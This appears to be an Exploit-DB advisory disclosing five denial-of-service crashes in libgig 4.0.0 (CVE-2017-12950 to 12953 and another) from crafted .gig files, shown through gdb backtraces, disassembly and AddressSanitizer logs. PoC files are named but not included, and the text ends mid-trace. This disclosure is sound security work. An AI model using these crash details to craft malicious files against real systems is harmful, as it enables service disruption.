* (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes
* *

platforms/linux/dos/42546.txt Executable file

@ -0,0 +1,587 @@
================
Author : qflb.wu
===============
Introduction:
=============
https://www.linuxsampler.org/libgig/
libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data.
Affected version:
=====
4.0.0
Vulnerability Description:
==========================
1.
the gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_null_pointer_dereference_1.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
2970 if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
(gdb) bt
#0 0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
#1 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
at gig.cpp:4404
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je 0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor %edx,%edx
0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov %eax,%esi
0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov %rbx,%rdi
0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov 0x138(%r13),%r14
0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq 0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
=> 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov %rax,0x38(%r14)
0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add $0x1,%ebp
0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add $0x8,%r13
0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp %ebp,0x130(%rbx)
End of assembler dump.
(gdb) i r
rax 0x60ca906343312
rbx 0x614ce06376672
rcx 0x33
rdx 0x60a3006333184
rsi 0x00
rdi 0x6091606328672
rbp 0x00x0
rsp 0x7fffffffdcc00x7fffffffdcc0
r8 0x00
r9 0x22
r10 0x00
r11 0x246582
r12 0x6159506379856
r13 0x614ce06376672
r14 0x00
r15 0x00
rip 0x7ffff7bc07df0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
eflags 0x10246[ PF ZF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
==40516== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_1.gig
CVE:
CVE-2017-12950
2.
the gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(stack buffer overflow and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_stack_buffer_overflow.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
2884 table[0] = 0;
(gdb) bt
#0 0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
#1 0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2054
#2 0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>,
vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>,
vcfCutoffController=<optimized out>) at gig.cpp:2042
#3 0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
at gig.cpp:1617
#4 0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
#5 0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0,
pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
#6 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280,
pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#7 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#8 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
---Type <return> to continue, or q <return> to quit---
this=this@entry=0x609160) at gig.cpp:5378
#9 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
...
0x00007ffff7bb8b27 <+2119>:mov 0x2e0(%rsp,%rdx,8),%rsi
0x00007ffff7bb8b2f <+2127>:je 0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
0x00007ffff7bb8b3d <+2141>:movq $0x0,(%rax)
=> 0x00007ffff7bb8b44 <+2148>:mov 0x8(%rsi),%edi
0x00007ffff7bb8b47 <+2151>:lea 0x8(%rax),%rcx
---Type <return> to continue, or q <return> to quit---
0x00007ffff7bb8b4b <+2155>:mov 0xc(%rsi),%r10d
0x00007ffff7bb8b4f <+2159>:mov $0x1,%edx
...
(gdb) i r
rax 0x60e0506348880
rbx 0x1420
rcx 0x7ffff7669760140737344083808
rdx 0xfe254
rsi 0x2f736c6f6f742f633419195767971393379
rdi 0x22
rbp 0x00x0
rsp 0x7fffffffd8600x7fffffffd860
r8 0x60dbc06347712
r9 0x4064
r10 0x7fffffffd9f0140737488345584
r11 0x7ffff7bbf601140737349678593
r12 0x44
r13 0x60d7706346608
r14 0x60c3a06341536
r15 0x60c3a06341536
rip 0x7ffff7bb8b440x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
eflags 0x10246[ PF ZF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb) x/20x $rsi+0x8
0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
(gdb)
0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
(gdb)
==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
READ of size 8 at 0x7ffc9ca05fa0 thread T0
#0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
#1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
#2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
#3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
#4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
#5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
This frame has 2 object(s):
[32, 40) 'name'
[96, 104) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
Shadow bytes around the buggy address:
0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
=>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==40504== ABORTING
POC:
libgig_4.0.0_stack_buffer_overflow.gig
CVE:
CVE-2017-12951
3.
the LoadString function in helper.h in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_null_pointer_dereference_2.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
LoadString (s="", ck=0x6095d0) at helper.h:148
148 if (str[len] == '\0') break;
(gdb) bt
#0 LoadString (s="", ck=0x6095d0) at helper.h:148
#1 DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865,
lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
#2 0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
at DLS.cpp:263
#3 0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160,
Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
at DLS.cpp:448
#4 0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
at DLS.cpp:1435
#5 0x00007ffff7bbab2e in gig::File::File (this=0x609160,
pRIFF=<optimized out>) at gig.cpp:5201
#6 0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:70
(gdb) disassemble
Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
0x00007ffff7ba7f30 <+0>:push %rbp
0x00007ffff7ba7f31 <+1>:mov %edi,%eax
0x00007ffff7ba7f33 <+3>:mov %rsi,%rdi
0x00007ffff7ba7f36 <+6>:mov %eax,%esi
0x00007ffff7ba7f38 <+8>:push %rbx
0x00007ffff7ba7f39 <+9>:mov %rdx,%rbx
0x00007ffff7ba7f3c <+12>:sub $0x8,%rsp
0x00007ffff7ba7f40 <+16>:callq 0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
0x00007ffff7ba7f45 <+21>:test %rax,%rax
0x00007ffff7ba7f48 <+24>:mov %rax,%rbp
0x00007ffff7ba7f4b <+27>:je 0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
0x00007ffff7ba7f4d <+29>:mov %rax,%rdi
0x00007ffff7ba7f50 <+32>:callq 0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
0x00007ffff7ba7f55 <+37>:mov 0xc(%rbp),%r10d
0x00007ffff7ba7f59 <+41>:mov %rax,%rsi
0x00007ffff7ba7f5c <+44>:test %r10d,%r10d
0x00007ffff7ba7f5f <+47>:jle 0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
---Type <return> to continue, or q <return> to quit---
=> 0x00007ffff7ba7f61 <+49>:cmpb $0x0,(%rax)
0x00007ffff7ba7f64 <+52>:je 0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
0x00007ffff7ba7f66 <+54>:mov $0x1,%r9d
0x00007ffff7ba7f6c <+60>:xor %ecx,%ecx
0x00007ffff7ba7f6e <+62>:jmp 0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
0x00007ffff7ba7f70 <+64>:cmpb $0x0,(%rsi,%r9,1)
0x00007ffff7ba7f75 <+69>:lea 0x1(%r9),%r8
0x00007ffff7ba7f79 <+73>:je 0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
0x00007ffff7ba7f7b <+75>:mov %r8,%r9
0x00007ffff7ba7f7e <+78>:add $0x1,%ecx
0x00007ffff7ba7f81 <+81>:cmp %r10d,%ecx
0x00007ffff7ba7f84 <+84>:jne 0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
0x00007ffff7ba7f89 <+89>:mov %rbx,%rdi
0x00007ffff7ba7f8c <+92>:callq 0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
0x00007ffff7ba7f91 <+97>:add $0x8,%rsp
0x00007ffff7ba7f95 <+101>:mov %rbp,%rdi
0x00007ffff7ba7f98 <+104>:pop %rbx
0x00007ffff7ba7f99 <+105>:pop %rbp
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax 0x00
rbx 0x6092386328888
rcx 0x7ffff739f9f7140737341159927
rdx 0x7ffff5d9f000140737318088704
rsi 0x00
rdi 0x7ffff5d9f000140737318088704
rbp 0x6095d00x6095d0
rsp 0x7fffffffdd800x7fffffffdd80
r8 0xffffffff4294967295
r9 0x00
r10 0x100001a16777242
r11 0x247583
r12 0x6092206328864
r13 0x7fffffffdfa0140737488347040
r14 0x00
r15 0x6091a06328736
rip 0x7ffff7ba7f610x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
eflags 0x10202[ IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
#1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
#2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
#3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
#4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
#5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
#6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
#7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
==41244== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_2.gig
CVE:
CVE-2017-12952
4.
the gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory write and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_write.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
4445 RegionKeyTable[iKey] = pRegion;
(gdb) bt
#0 gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
at gig.cpp:4445
#1 0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0,
pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
at gig.cpp:4409
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
0x00007ffff7bba240 <+0>:xor %eax,%eax
0x00007ffff7bba242 <+2>:nopw 0x0(%rax,%rax,1)
0x00007ffff7bba248 <+8>:movq $0x0,0x80(%rdi,%rax,1)
0x00007ffff7bba254 <+20>:add $0x8,%rax
0x00007ffff7bba258 <+24>:cmp $0x400,%rax
0x00007ffff7bba25e <+30>:jne 0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
0x00007ffff7bba260 <+32>:mov 0x60(%rdi),%r9
0x00007ffff7bba264 <+36>:mov (%r9),%r8
0x00007ffff7bba267 <+39>:cmp %r9,%r8
0x00007ffff7bba26a <+42>:je 0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
0x00007ffff7bba26c <+44>:nopl 0x0(%rax)
0x00007ffff7bba270 <+48>:mov 0x10(%r8),%rcx
0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
0x00007ffff7bba27c <+60>:cmp %esi,%eax
0x00007ffff7bba27e <+62>:jg 0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
0x00007ffff7bba280 <+64>:add $0x1,%esi
0x00007ffff7bba283 <+67>:nopl 0x0(%rax,%rax,1)
0x00007ffff7bba288 <+72>:movslq %eax,%rdx
---Type <return> to continue, or q <return> to quit---
0x00007ffff7bba28b <+75>:add $0x1,%eax
0x00007ffff7bba28e <+78>:cmp %esi,%eax
=> 0x00007ffff7bba290 <+80>:mov %rcx,0x80(%rdi,%rdx,8)
0x00007ffff7bba298 <+88>:jne 0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
0x00007ffff7bba29a <+90>:mov (%r8),%r8
0x00007ffff7bba29d <+93>:cmp %r8,%r9
0x00007ffff7bba2a0 <+96>:jne 0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
0x00007ffff7bba2a2 <+98>:repz retq
0x00007ffff7bba2a4 <+100>:repz retq
End of assembler dump.
(gdb) i r
rax 0x3fbd16317
rbx 0x60a1a06332832
rcx 0x60d5806346112
rdx 0x3fbc16316
rsi 0x420116897
rdi 0x60a1a06332832
rbp 0x7fffffffdd900x7fffffffdd90
rsp 0x7fffffffdd080x7fffffffdd08
r8 0x60e7406350656
r9 0x60b0f06336752
r10 0x7fffffffdad0140737488345808
r11 0x7ffff7bba240140737349657152
r12 0x00
r13 0x60a0c06332608
r14 0x60a9806334848
r15 0x60d5806346112
rip 0x7ffff7bba2900x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
eflags 0x10283[ CF SF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
AddressSanitizer can not provide additional info.
#0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
#1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
#2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
==43045== ABORTING
POC:
libgig_4.0.0_invalid_memory_write.gig
CVE:
CVE-2017-12953
5.
the gig::Region::GetSampleFromWavePool function in gig.cpp in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory read and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_read.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
3849 unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
(gdb) bt
#0 gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
#1 0x00007ffff7bc07df in gig::Region::Region (this=0x612520,
pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
#2 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#3 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#4 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#5 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#6 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
0x00007ffff7bbac00 <+0>:cmp $0xffffffff,%esi
0x00007ffff7bbac03 <+3>:je 0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
0x00007ffff7bbac05 <+5>:push %r12
0x00007ffff7bbac07 <+7>:push %rbp
0x00007ffff7bbac08 <+8>:push %rbx
0x00007ffff7bbac09 <+9>:mov 0x18(%rdi),%rax
0x00007ffff7bbac0d <+13>:mov 0x18(%rax),%rbx
0x00007ffff7bbac11 <+17>:mov 0x78(%rbx),%rax
0x00007ffff7bbac15 <+21>:test %rax,%rax
0x00007ffff7bbac18 <+24>:je 0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
0x00007ffff7bbac1a <+26>:mov %esi,%ecx
0x00007ffff7bbac1c <+28>:mov %rbx,%rdi
0x00007ffff7bbac1f <+31>:mov %rdx,%rsi
=> 0x00007ffff7bbac22 <+34>:mov (%rax,%rcx,4),%ebp
0x00007ffff7bbac25 <+37>:mov 0x80(%rbx),%rax
0x00007ffff7bbac2c <+44>:mov (%rax,%rcx,4),%r12d
0x00007ffff7bbac30 <+48>:callq 0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
0x00007ffff7bbac35 <+53>:test %rax,%rax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax 0x609f806332288
rbx 0x6091606328672
rcx 0xff0000004278190080
rdx 0x00
rsi 0x00
rdi 0x6091606328672
rbp 0x00x0
rsp 0x7fffffffdc900x7fffffffdc90
r8 0x00
r9 0x22
r10 0x00
r11 0x246582
r12 0x6131906369680
r13 0x6125206366496
r14 0x00
r15 0x00
rip 0x7ffff7bbac220x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
eflags 0x10202[ IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
#0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
#1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
